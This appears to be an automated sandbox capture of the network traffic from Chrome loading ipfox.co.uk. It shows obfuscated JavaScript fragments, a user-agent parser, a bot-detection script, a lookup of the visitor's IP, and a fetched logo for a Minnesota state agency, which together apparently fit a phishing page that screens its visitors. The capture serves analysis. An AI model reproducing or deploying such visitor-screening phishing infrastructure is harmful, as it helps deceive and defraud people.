                                              2024-10-25 13:45:08 UTC16384INData Raw: 21 58 27 2c 30 78 38 30 39 2c 30 78 36 65 33 29 2b 5f 30 78 35 36 38 66 31 35 28 30 78 34 61 37 2c 30 78 38 34 39 2c 2d 30 78 36 38 2c 27 63 61 21 58 27 2c 2d 30 78 34 65 38 29 2b 5f 30 78 31 38 39 31 30 64 28 30 78 35 66 65 2c 30 78 62 62 30 2c 27 36 41 43 39 27 2c 30 78 63 66 66 2c 30 78 61 39 66 29 2b 5f 30 78 34 62 36 38 36 35 28 27 63 61 21 58 27 2c 30 78 31 31 36 38 2c 30 78 38 33 39 2c 30 78 34 35 2c 30 78 31 30 64 38 29 2b 5f 30 78 31 38 39 31 30 64 28 30 78 37 32 33 2c 30 78 37 37 36 2c 27 47 32 53 59 27 2c 30 78 63 62 61 2c 30 78 65 34 38 29 2b 5f 30 78 37 66 30 39 37 34 28 30 78 66 34 39 2c 30 78 62 38 32 2c 30 78 64 34 38 2c 30 78 31 30 36 31 2c 27 72 53 4f 63 27 29 2b 5f 30 78 37 66 30 39 37 34 28 30 78 37 33 34 2c 30 78 31 30 63 38 2c 30 78
                                              Data Ascii: !X',0x809,0x6e3)+_0x568f15(0x4a7,0x849,-0x68,'ca!X',-0x4e8)+_0x18910d(0x5fe,0xbb0,'6AC9',0xcff,0xa9f)+_0x4b6865('ca!X',0x1168,0x839,0x45,0x10d8)+_0x18910d(0x723,0x776,'G2SY',0xcba,0xe48)+_0x7f0974(0xf49,0xb82,0xd48,0x1061,'rSOc')+_0x7f0974(0x734,0x10c8,0x
                                              2024-10-25 13:45:08 UTC398INData Raw: 27 75 49 6e 4c 27 2c 30 78 31 31 30 35 29 2b 5f 30 78 31 63 30 30 34 62 28 30 78 31 61 62 36 2c 30 78 31 63 32 63 2c 30 78 31 35 62 32 2c 27 4e 51 4f 36 27 2c 30 78 31 36 31 64 29 2b 5f 30 78 37 66 30 39 37 34 28 30 78 31 34 31 31 2c 30 78 31 39 65 61 2c 30 78 64 38 66 2c 30 78 31 35 62 35 2c 27 45 67 71 33 27 29 2b 5f 30 78 31 63 30 30 34 62 28 30 78 61 33 65 2c 30 78 35 38 62 2c 30 78 35 33 65 2c 27 45 67 71 33 27 2c 2d 30 78 31 34 66 29 2b 5f 30 78 31 63 30 30 34 62 28 30 78 61 36 63 2c 30 78 39 66 61 2c 30 78 36 38 39 2c 27 69 6e 48 68 27 2c 30 78 62 64 37 29 2b 5f 30 78 34 62 36 38 36 35 28 27 6e 6b 4c 6b 27 2c 30 78 32 34 36 2c 30 78 61 62 66 2c 30 78 31 30 31 65 2c 30 78 32 63 62 29 2b 5f 30 78 34 62 36 38 36 35 28 27 55 59 56 35 27 2c 30 78 37 39
                                              Data Ascii: 'uInL',0x1105)+_0x1c004b(0x1ab6,0x1c2c,0x15b2,'NQO6',0x161d)+_0x7f0974(0x1411,0x19ea,0xd8f,0x15b5,'Egq3')+_0x1c004b(0xa3e,0x58b,0x53e,'Egq3',-0x14f)+_0x1c004b(0xa6c,0x9fa,0x689,'inHh',0xbd7)+_0x4b6865('nkLk',0x246,0xabf,0x101e,0x2cb)+_0x4b6865('UYV5',0x79


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449739104.17.24.144431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:08 UTC560OUTGET /ajax/libs/UAParser.js/0.7.31/ua-parser.min.js HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:08 UTC946INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:08 GMT
                                              Content-Type: application/javascript; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: W/"6179331d-1a2b"
                                              Last-Modified: Wed, 27 Oct 2021 11:08:13 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: MISS
                                              Expires: Wed, 15 Oct 2025 13:45:08 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smfvoK4j5uXEf0QhMnsrH7cGCEOs8C2VF4xiqFCkINQSkpijJ3FuuYukunLYPMqkAvPe2MNgMKi3xP3aLCu%2Fs5qtKNYk3pIi4P2FFFOpNuZGAL013QVBxnUEjAc64J%2F45iCRb%2Fqm"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8d82a5340faf316e-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              2024-10-25 13:45:08 UTC423INData Raw: 33 62 61 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 72 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 69 29 7b 66 6f 72 28 76 61 72 20 65 3d 7b 7d 2c 6f 3d 30 3b 6f 3c 69 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 65 5b 69 5b 6f 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 69 5b 6f 5d 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 69 2c 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 69 3d 3d 3d 70 26 26 2d 31 21 3d 3d 46 28 65 29 2e 69 6e 64 65 78 4f 66 28 46 28 69 29 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 69 2c 65 29 7b 69 66 28 74 79 70 65 6f 66 20 69 3d 3d 3d 70 29 72 65 74 75 72 6e 20 69 3d 69 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 5c 73 2a 2f 2c 77 29 2e 72 65 70 6c 61 63 65 28 2f 5c 73 5c 73 2a 24
                                              Data Ascii: 3ba3!function(r,d){"use strict";function i(i){for(var e={},o=0;o<i.length;o++)e[i[o].toUpperCase()]=i[o];return e}function n(i,e){return typeof i===p&&-1!==F(e).indexOf(F(i))}function t(i,e){if(typeof i===p)return i=i.replace(/^\s\s*/,w).replace(/\s\s*$
                                              2024-10-25 13:45:08 UTC1369INData Raw: 3c 77 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 74 3d 6e 5b 2b 2b 6f 5d 2c 74 79 70 65 6f 66 28 72 3d 77 5b 61 5d 29 3d 3d 3d 63 26 26 30 3c 72 2e 6c 65 6e 67 74 68 3f 32 3d 3d 3d 72 2e 6c 65 6e 67 74 68 3f 74 79 70 65 6f 66 20 72 5b 31 5d 3d 3d 75 3f 74 68 69 73 5b 72 5b 30 5d 5d 3d 72 5b 31 5d 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 3a 74 68 69 73 5b 72 5b 30 5d 5d 3d 72 5b 31 5d 3a 33 3d 3d 3d 72 2e 6c 65 6e 67 74 68 3f 74 79 70 65 6f 66 20 72 5b 31 5d 21 3d 3d 75 7c 7c 72 5b 31 5d 2e 65 78 65 63 26 26 72 5b 31 5d 2e 74 65 73 74 3f 74 68 69 73 5b 72 5b 30 5d 5d 3d 74 3f 74 2e 72 65 70 6c 61 63 65 28 72 5b 31 5d 2c 72 5b 32 5d 29 3a 64 3a 74 68 69 73 5b 72 5b 30 5d 5d 3d 74 3f 72 5b 31 5d 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2c 72 5b 32 5d 29 3a 64 3a 34 3d 3d
                                              Data Ascii: <w.length;a++)t=n[++o],typeof(r=w[a])===c&&0<r.length?2===r.length?typeof r[1]==u?this[r[0]]=r[1].call(this,t):this[r[0]]=r[1]:3===r.length?typeof r[1]!==u||r[1].exec&&r[1].test?this[r[0]]=t?t.replace(r[1],r[2]):d:this[r[0]]=t?r[1].call(this,t,r[2]):d:4==
                                              2024-10-25 13:45:08 UTC1369INData Raw: 28 29 2c 6f 73 3a 74 68 69 73 2e 67 65 74 4f 53 28 29 2c 64 65 76 69 63 65 3a 74 68 69 73 2e 67 65 74 44 65 76 69 63 65 28 29 2c 63 70 75 3a 74 68 69 73 2e 67 65 74 43 50 55 28 29 7d 7d 2c 74 68 69 73 2e 67 65 74 55 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 74 68 69 73 2e 73 65 74 55 41 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 20 6f 3d 74 79 70 65 6f 66 20 69 3d 3d 3d 70 26 26 32 35 35 3c 69 2e 6c 65 6e 67 74 68 3f 74 28 69 2c 32 35 35 29 3a 69 2c 74 68 69 73 7d 2c 74 68 69 73 2e 73 65 74 55 41 28 6f 29 2c 74 68 69 73 7d 76 61 72 20 77 3d 22 22 2c 75 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 6c 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 70 3d 22 73 74 72 69 6e 67 22 2c 6d 3d 22 6d 6f 64 65
                                              Data Ascii: (),os:this.getOS(),device:this.getDevice(),cpu:this.getCPU()}},this.getUA=function(){return o},this.setUA=function(i){return o=typeof i===p&&255<i.length?t(i,255):i,this},this.setUA(o),this}var w="",u="function",l="undefined",c="object",p="string",m="mode
                                              2024-10-25 13:45:08 UTC1369INData Raw: 6c 74 7c 69 72 6f 6e 7c 76 69 76 61 6c 64 69 7c 69 72 69 64 69 75 6d 7c 70 68 61 6e 74 6f 6d 6a 73 7c 62 6f 77 73 65 72 7c 71 75 61 72 6b 7c 71 75 70 7a 69 6c 6c 61 7c 66 61 6c 6b 6f 6e 7c 72 65 6b 6f 6e 71 7c 70 75 66 66 69 6e 7c 62 72 61 76 65 7c 77 68 61 6c 65 7c 71 71 62 72 6f 77 73 65 72 6c 69 74 65 7c 71 71 29 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 77 65 69 62 6f 29 5f 5f 28 5b 5c 64 5c 2e 5d 2b 29 2f 69 5d 2c 5b 66 2c 76 5d 2c 5b 2f 28 3f 3a 5c 62 75 63 3f 20 3f 62 72 6f 77 73 65 72 7c 28 3f 3a 6a 75 63 2e 2b 29 75 63 77 65 62 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 76 2c 5b 66 2c 22 55 43 22 2b 41 5d 5d 2c 5b 2f 5c 62 71 62 63 6f 72 65 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 76 2c 5b 66 2c 22 57 65 43 68
                                              Data Ascii: lt|iron|vivaldi|iridium|phantomjs|bowser|quark|qupzilla|falkon|rekonq|puffin|brave|whale|qqbrowserlite|qq)\/([-\w\.]+)/i,/(weibo)__([\d\.]+)/i],[f,v],[/(?:\buc? ?browser|(?:juc.+)ucweb)[\/ ]?([\w\.]+)/i],[v,[f,"UC"+A]],[/\bqbcore\/([\w\.]+)/i],[v,[f,"WeCh
                                              2024-10-25 13:45:08 UTC1369INData Raw: 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 2e 2a 73 61 66 61 72 69 5c 2f 2f 69 5d 2c 5b 76 2c 5b 66 2c 22 47 53 41 22 5d 5d 2c 5b 2f 68 65 61 64 6c 65 73 73 63 68 72 6f 6d 65 28 3f 3a 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 7c 20 29 2f 69 5d 2c 5b 76 2c 5b 66 2c 43 2b 22 20 48 65 61 64 6c 65 73 73 22 5d 5d 2c 5b 2f 20 77 76 5c 29 2e 2b 28 63 68 72 6f 6d 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 66 2c 43 2b 22 20 57 65 62 56 69 65 77 22 5d 2c 76 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 20 76 65 72 73 69 6f 6e 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 5c 62 2e 2b 28 3f 3a 6d 6f 62 69 6c 65 20 73 61 66 61 72 69 7c 73 61 66 61 72 69 29 2f 69 5d 2c 5b 76 2c 5b 66 2c 22 41 6e 64 72 6f 69 64 20 22 2b 41 5d 5d 2c 5b 2f 28 63 68 72 6f 6d 65 7c 6f 6d 6e 69 77 65 62 7c 61 72 6f 72 61
                                              Data Ascii: /([\w\.]+) .*safari\//i],[v,[f,"GSA"]],[/headlesschrome(?:\/([\w\.]+)| )/i],[v,[f,C+" Headless"]],[/ wv\).+(chrome)\/([\w\.]+)/i],[[f,C+" WebView"],v],[/droid.+ version\/([\w\.]+)\b.+(?:mobile safari|safari)/i],[v,[f,"Android "+A]],[/(chrome|omniweb|arora
                                              2024-10-25 13:45:08 UTC1369INData Raw: 2c 5b 5b 78 2c 22 61 72 6d 36 34 22 5d 5d 2c 5b 2f 5c 62 28 61 72 6d 28 3f 3a 76 5b 36 37 5d 29 3f 68 74 3f 6e 3f 5b 66 6c 5d 70 3f 29 5c 62 2f 69 5d 2c 5b 5b 78 2c 22 61 72 6d 68 66 22 5d 5d 2c 5b 2f 77 69 6e 64 6f 77 73 20 28 63 65 7c 6d 6f 62 69 6c 65 29 3b 20 70 70 63 3b 2f 69 5d 2c 5b 5b 78 2c 22 61 72 6d 22 5d 5d 2c 5b 2f 28 28 3f 3a 70 70 63 7c 70 6f 77 65 72 70 63 29 28 3f 3a 36 34 29 3f 29 28 3f 3a 20 6d 61 63 7c 3b 7c 5c 29 29 2f 69 5d 2c 5b 5b 78 2c 2f 6f 77 65 72 2f 2c 77 2c 46 5d 5d 2c 5b 2f 28 73 75 6e 34 5c 77 29 5b 3b 5c 29 5d 2f 69 5d 2c 5b 5b 78 2c 22 73 70 61 72 63 22 5d 5d 2c 5b 2f 28 28 3f 3a 61 76 72 33 32 7c 69 61 36 34 28 3f 3d 3b 29 29 7c 36 38 6b 28 3f 3d 5c 29 29 7c 5c 62 61 72 6d 28 3f 3d 76 28 3f 3a 5b 31 2d 37 5d 7c 5b 35 2d
                                              Data Ascii: ,[[x,"arm64"]],[/\b(arm(?:v[67])?ht?n?[fl]p?)\b/i],[[x,"armhf"]],[/windows (ce|mobile); ppc;/i],[[x,"arm"]],[/((?:ppc|powerpc)(?:64)?)(?: mac|;|\))/i],[[x,/ower/,w,F]],[/(sun4\w)[;\)]/i],[[x,"sparc"]],[/((?:avr32|ia64(?=;))|68k(?=\))|\barm(?=v(?:[1-7]|[5-
                                              2024-10-25 13:45:08 UTC1369INData Raw: 2b 29 28 3f 3a 20 62 75 69 7c 5c 29 29 2f 69 2c 2f 5c 62 28 76 5b 31 32 5d 5c 64 7b 33 7d 5c 77 3f 5b 61 74 5d 29 28 3f 3a 20 62 75 69 7c 3b 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 56 69 76 6f 22 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 5c 62 28 72 6d 78 5b 31 32 5d 5c 64 7b 33 7d 29 28 3f 3a 20 62 75 69 7c 3b 7c 5c 29 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 52 65 61 6c 6d 65 22 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 5c 62 28 6d 69 6c 65 73 74 6f 6e 65 7c 64 72 6f 69 64 28 3f 3a 5b 32 2d 34 78 5d 7c 20 28 3f 3a 62 69 6f 6e 69 63 7c 78 32 7c 70 72 6f 7c 72 61 7a 72 29 29 3f 3a 3f 28 20 34 67 29 3f 29 5c 62 5b 5c 77 20 5d 2b 62 75 69 6c 64 5c 2f 2f 69 2c 2f 5c 62 6d 6f 74 28 3f 3a 6f 72 6f 6c 61 29 3f 5b 2d 20 5d 28 5c 77 2a 29 2f 69 2c 2f 28 28 3f 3a 6d 6f 74 6f 5b 5c 77 5c 28
                                              Data Ascii: +)(?: bui|\))/i,/\b(v[12]\d{3}\w?[at])(?: bui|;)/i],[m,[g,"Vivo"],[h,a]],[/\b(rmx[12]\d{3})(?: bui|;|\))/i],[m,[g,"Realme"],[h,a]],[/\b(milestone|droid(?:[2-4x]| (?:bionic|x2|pro|razr))?:?( 4g)?)\b[\w ]+build\//i,/\bmot(?:orola)?[- ](\w*)/i,/((?:moto[\w\(
                                              2024-10-25 13:45:08 UTC1369INData Raw: 2c 5b 67 2c 54 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 28 70 6c 61 79 62 6f 6f 6b 29 3b 5b 2d 5c 77 5c 29 2c 3b 20 5d 2b 28 72 69 6d 29 2f 69 5d 2c 5b 6d 2c 67 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 62 62 5b 61 2d 66 5d 7c 73 74 5b 68 76 5d 29 31 30 30 2d 5c 64 29 2f 69 2c 2f 5c 28 62 62 31 30 3b 20 28 5c 77 2b 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 4e 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 28 3f 3a 5c 62 7c 61 73 75 73 5f 29 28 74 72 61 6e 73 66 6f 5b 70 72 69 6d 65 20 5d 7b 34 2c 31 30 7d 20 5c 77 2b 7c 65 65 65 70 63 7c 73 6c 69 64 65 72 20 5c 77 2b 7c 6e 65 78 75 73 20 37 7c 70 61 64 66 6f 6e 65 7c 70 30 30 5b 63 6a 5d 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 7a 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 20 28 7a 5b 62 65 73 5d 36 5b 30 32 37 5d 5b 30 31 32 5d 5b 6b 6d 5d 5b 6c
                                              Data Ascii: ,[g,T],[h,a]],[/(playbook);[-\w\),; ]+(rim)/i],[m,g,[h,k]],[/\b((?:bb[a-f]|st[hv])100-\d)/i,/\(bb10; (\w+)/i],[m,[g,N],[h,a]],[/(?:\b|asus_)(transfo[prime ]{4,10} \w+|eeepc|slider \w+|nexus 7|padfone|p00[cj])/i],[m,[g,z],[h,k]],[/ (z[bes]6[027][012][km][l
                                              2024-10-25 13:45:08 UTC1369INData Raw: 67 2c 22 53 69 65 6d 65 6e 73 22 5d 2c 5b 68 2c 61 5d 5d 2c 5b 2f 5c 62 28 72 63 74 5c 77 2b 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 52 43 41 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 76 65 6e 75 65 5b 5c 64 20 5d 7b 32 2c 37 7d 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 44 65 6c 6c 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 71 28 3f 3a 6d 76 7c 74 61 29 5c 77 2b 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 56 65 72 69 7a 6f 6e 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 3f 3a 62 61 72 6e 65 73 5b 26 20 5d 2b 6e 6f 62 6c 65 20 7c 62 6e 5b 72 74 5d 29 28 5b 5c 77 5c 2b 20 5d 2a 29 20 62 2f 69 5d 2c 5b 6d 2c 5b 67 2c 22 42 61 72 6e 65 73 20 26 20 4e 6f 62 6c 65 22 5d 2c 5b 68 2c 6b 5d 5d 2c 5b 2f 5c 62 28 74 6d 5c 64 7b 33 7d 5c 77 2b 29 20 62 2f 69 5d
                                              Data Ascii: g,"Siemens"],[h,a]],[/\b(rct\w+) b/i],[m,[g,"RCA"],[h,k]],[/\b(venue[\d ]{2,7}) b/i],[m,[g,"Dell"],[h,k]],[/\b(q(?:mv|ta)\w+) b/i],[m,[g,"Verizon"],[h,k]],[/\b(?:barnes[& ]+noble |bn[rt])([\w\+ ]*) b/i],[m,[g,"Barnes & Noble"],[h,k]],[/\b(tm\d{3}\w+) b/i]
                                              2024-10-25 13:45:08 UTC1369INData Raw: 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 6d 2c 5b 67 2c 42 5d 2c 5b 68 2c 6f 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 6d 2c 5b 67 2c 52 5d 2c 5b 68 2c 6f 5d 5d 2c 5b 2f 73 6d 61 72 74 2d 74 76 2e 2b 28 73 61 6d 73 75 6e 67 29 2f 69 5d 2c 5b 67 2c 5b 68 2c 79 5d 5d 2c 5b 2f 68 62 62 74 76 2e 2b 6d 61 70 6c 65 3b 28 5c 64 2b 29 2f 69 5d 2c 5b 5b 6d 2c 2f 5e 2f 2c 22 53 6d 61 72 74 54 56 22 5d 2c 5b 67 2c 56 5d 2c 5b 68 2c 79 5d 5d 2c 5b 2f 28 6e 75 78 3b 20 6e 65 74 63 61 73 74 2e 2b 73 6d 61 72 74 74 76 7c 6c 67 20 28 6e 65 74 63 61 73 74 5c 2e 74 76 2d 32 30 31 5c 64 7c 61 6e 64 72 6f 69 64 20 74 76 29 29
                                              Data Ascii: (playstation [345portablevi]+)/i],[m,[g,B],[h,o]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[m,[g,R],[h,o]],[/smart-tv.+(samsung)/i],[g,[h,y]],[/hbbtv.+maple;(\d+)/i],[[m,/^/,"SmartTV"],[g,V],[h,y]],[/(nux; netcast.+smarttv|lg (netcast\.tv-201\d|android tv))


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.44974013.32.99.974431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:08 UTC540OUTGET /botd/v1 HTTP/1.1
                                              Host: openfpcdn.io
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://ipfox.co.uk
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:09 UTC698INHTTP/1.1 200 OK
                                              Content-Type: text/javascript; charset=utf-8
                                              Content-Length: 15196
                                              Connection: close
                                              Server: CloudFront
                                              Access-Control-Allow-Origin: *
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Date: Fri, 25 Oct 2024 13:45:09 GMT
                                              Cache-Control: public, max-age=581292, s-maxage=10733
                                              ETag: "5co2cnhGrt59+8B+iLKwJesMrpA"
                                              Vary: Accept-Encoding
                                              X-Cache: Hit from cloudfront
                                              Via: 1.1 319f376925908156190f5fc160137b42.cloudfront.net (CloudFront)
                                              X-Amz-Cf-Pop: FRA60-P3
                                              Alt-Svc: h3=":443"; ma=86400
                                              X-Amz-Cf-Id: s4A1n-LoRo0TQx9UGK5CCz4z02leEy7LSo_CmLyTSODFUoQ9LxsbCQ==
                                              Age: 1318
                                              2024-10-25 13:45:09 UTC15196INData Raw: 2f 2a 2a 0a 20 2a 20 46 69 6e 67 65 72 70 72 69 6e 74 20 42 6f 74 44 20 76 31 2e 39 2e 31 20 2d 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 69 6e 67 65 72 70 72 69 6e 74 4a 53 2c 20 49 6e 63 2c 20 32 30 32 34 20 28 68 74 74 70 73 3a 2f 2f 66 69 6e 67 65 72 70 72 69 6e 74 2e 63 6f 6d 29 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 29 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d
                                              Data Ascii: /** * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com) * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license. */var e=function(n,t){return e=Object.setPrototypeOf||{__proto__:[]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449742104.26.13.2054431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:10 UTC545OUTGET /?format=json HTTP/1.1
                                              Host: api.ipify.org
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Origin: https://ipfox.co.uk
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:10 UTC249INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:10 GMT
                                              Content-Type: application/json
                                              Content-Length: 23
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8d82a53ffafa6c6c-DFW
                                              2024-10-25 13:45:10 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 22 7d
                                              Data Ascii: {"ip":"173.254.250.81"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.44974313.32.27.1294431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:10 UTC586OUTGET /ag.state.mn.us HTTP/1.1
                                              Host: logo.clearbit.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:10 UTC548INHTTP/1.1 200 OK
                                              Content-Type: image/png
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              Cache-Control: public, max-age=2592000
                                              Date: Fri, 25 Oct 2024 13:45:10 GMT
                                              x-envoy-response-flags: -
                                              Server: Clearbit
                                              strict-transport-security: max-age=63072000; includeSubDomains; preload
                                              x-content-type-options: nosniff
                                              X-Cache: Miss from cloudfront
                                              Via: 1.1 3298c44116035984c2fac24b89183c4e.cloudfront.net (CloudFront)
                                              X-Amz-Cf-Pop: FRA56-C2
                                              X-Amz-Cf-Id: H63Uu17u4xDhsyrSGUPML7mXEgIPGP7hLRH_RZErAJtxxGNNjrC9KQ==
